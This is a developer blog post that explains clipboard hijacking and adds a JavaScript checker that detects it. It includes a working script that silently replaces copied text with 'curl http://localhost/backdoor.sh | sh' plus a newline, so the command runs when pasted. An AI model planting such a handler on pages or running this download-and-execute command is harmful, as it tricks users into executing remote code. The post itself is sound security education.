The Dangers of Copy & Paste (Copas)

Ibnu Gunawan Prayogo

Tue, 04 2022, 8:10:00 pm


I'm sure fellow developers have at some point copied a command from a website. We assume that the text we're copying is legitimate. But is it? What if the text we copy is replaced with a command that can harm us or that contains malicious code?

All a hacker needs is a single command line that installs a backdoor or virus, allowing them to remotely control your device. This attack is simple yet effective. Here's a further explanation of how it works.

Watch the video: a simulation of the risk of copying code and executing it directly in a terminal. For instance, when we want to install a package with npm and find the command on a web page, most of us copy that text and paste it into the terminal without much thought. CodePen demo: Copy&Paste.

PROBLEM: Another issue here is that the hacker appends a newline (\n) to the harmful command. When the text is pasted, the newline acts as pressing Enter, so the copied command runs automatically.

Example Script Used:

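```html
<p id="copy">npm install package</p>

<script>
  // On copy, replace the clipboard text with a different command ending in "\n"
  document.getElementById('copy').addEventListener('copy', function (e) {
    e.clipboardData.setData('text/plain', 'curl http://localhost/backdoor.sh | sh\n');
    e.preventDefault(); // suppress the default copy of the visible text
  });
</script>
```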

How to Avoid It?

  • Ensure that the websites you visit are trustworthy and secure. For instance, when looking for documentation or a package, go directly to the official site.
  • As a precaution, don't paste copied text directly into the terminal. Try pasting it into a notepad or another text editor first.
  • In essence, avoid pasting text directly into the terminal.
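What to look for when pasting into an editor first, as advised above, shown as an added example that is not code from the original post: it compares the text visible on the page with what actually landed in the clipboard and flags newlines, control characters and download-piped-to-shell commands. The function names `inspectPaste` and `showControlChars` and the pattern list are illustrative assumptions; the sample strings are constructed from the script shown earlier.

```javascript
// Added example: inspect clipboard text before it reaches a shell.
// inspectPaste / showControlChars and the patterns are hypothetical names and rules.

// Make control characters visible, e.g. a newline becomes the two characters "\n".
function showControlChars(text) {
  return text.replace(/[\u0000-\u001f\u007f]/g, (ch) => {
    const named = { '\n': '\\n', '\r': '\\r', '\t': '\\t', '\u001b': '\\e' };
    return named[ch] || '\\x' + ch.charCodeAt(0).toString(16).padStart(2, '0');
  });
}

// Compare what was visible on the page with what landed in the clipboard.
function inspectPaste(visibleText, clipboardText) {
  const findings = [];
  if (clipboardText.trim() !== visibleText.trim()) {
    findings.push('clipboard text differs from the text shown on the page');
  }
  if (/[\r\n]/.test(clipboardText)) {
    findings.push('contains a newline: a shell may execute it on paste');
  }
  // Control characters other than tab, LF and CR (e.g. terminal escape sequences).
  if (/[\u0000-\u0008\u000b\u000c\u000e-\u001f\u007f]/.test(clipboardText)) {
    findings.push('contains non-printing control characters');
  }
  if (/\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b/.test(clipboardText)) {
    findings.push('pipes a download into a shell');
  }
  return {
    safe: findings.length === 0,
    shown: showControlChars(clipboardText),
    findings,
  };
}

// Constructed samples: the visible command and the string the copy handler sets.
const visible = 'npm install package';
const swapped = 'curl http://localhost/backdoor.sh | sh\n';

const report = inspectPaste(visible, swapped);
console.log(report.shown);
report.findings.forEach((f) => console.log(' - ' + f));
console.log('unchanged copy is safe:', inspectPaste(visible, visible).safe);
```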

# Author's Message

Always be cautious and vigilant, because we never know what kind of mischief we might face in the future.

That's all I have to offer. I hope it's helpful. Thank you! 😁